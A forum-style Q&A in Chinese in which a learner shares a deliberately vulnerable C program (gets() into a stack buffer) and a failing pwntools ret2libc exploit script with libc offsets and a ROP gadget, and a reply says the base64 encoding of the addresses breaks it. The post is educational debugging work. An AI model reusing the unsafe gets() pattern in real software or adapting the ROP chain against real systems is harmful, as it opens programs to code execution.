问题描述
我正在学习有关 bufferoverflow(ret2libc) 攻击的教程,但由于未知原因而失败。我写的C程序如下:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc,char** argv)
{
char buf[256];
gets(buf);
return 0;
}
我编译它所以它有checksec:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
我写的漏洞利用是:
from pwn import *
proc = process("./vuln")
junk = "A"*264
libc_base = 0x00007ffff7dee000
system_offset = 0x0000000000048df0
exec_offset = 0x00000000000cb7c0
exit_offset = 0x000000000003e600
binsh_offset = 0x18a156
system = str(base64.b64encode(p64(libc_base + system_offset)))
exit = str(base64.b64encode(p64(libc_base + exit_offset)))
binsh = str(base64.b64encode(p64(libc_base + binsh_offset)))
pop_rdi = str(base64.b64encode(p64(0x00000000004011bb)))
buf = junk + pop_rdi + binsh + system + exit
proc.sendline(buf)
proc.interactive()
[+] Starting local process './vuln': pid 1595
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 1595)
[*] Got EOF while sending in interactive
谁能告诉我这里有什么问题,提前致谢。
解决方法
在此处使用 base64.b64encode 是不好的,因为它会对地址进行编码并对执行代码的机器隐藏它们。
我没有检查好,可能还有其他错误,但首先要做的是将它们移除并将零件的地址传递给机器。